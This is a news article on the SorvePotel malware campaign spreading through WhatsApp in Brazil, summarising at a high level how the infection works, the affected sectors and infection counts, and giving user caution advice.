SorvePotel Malware Campaign Targets Brazilian WhatsApp Users, Spreads Through Windows Systems
A new malware campaign dubbed SorvePotel is rapidly spreading among WhatsApp users in Brazil, leveraging the messaging platform to infect Windows systems. Unlike typical cyberattacks focused on data theft or ransomware, this malware prioritizes rapid dissemination, according to recent reports.
The campaign utilizes convincing phishing messages containing malicious ZIP file attachments. These messages originate from compromised WhatsApp contacts, lending a deceptive air of credibility. A key indicator suggests the attackers are primarily targeting businesses rather than individual users, as the attachments are designed to be opened on desktop computers.
Once a user opens the attachment, a Windows shortcut (.LNK file) executes a PowerShell script. This script downloads the core malware payload from an external server and ensures its automatic execution with each system startup. The malware’s central function revolves around exploiting WhatsApp’s web interface. Upon detecting an active WhatsApp Web session, SorvePotel automatically distributes the malicious ZIP file to all contacts and groups associated with the compromised account.
The consequences of infection are significant, with numerous accounts being blocked due to violations of WhatsApp’s terms of service. As of the latest data, the vast majority of infections – 457 out of 477 cases – have been concentrated in Brazil, impacting a diverse range of sectors including government agencies, public services, manufacturing, technology companies, educational institutions, and the construction industry. This campaign underscores a growing trend of cybercriminals exploiting popular communication platforms to spread malware with minimal user interaction.
“This is a concerning development, as it demonstrates how easily malware can propagate through trusted networks like WhatsApp,” noted one cybersecurity analyst. “The focus on spreading, rather than immediate financial gain, suggests a potentially larger, more coordinated operation.”
The self-spreading nature of SorvePotel presents a unique challenge for cybersecurity professionals, requiring a proactive and multi-layered defense strategy. Users are urged to exercise extreme caution when receiving unexpected files from contacts, even those they know, and to verify the legitimacy of any attachments before opening them. This incident serves as a stark reminder of the evolving threat landscape and the importance of maintaining robust cybersecurity practices.
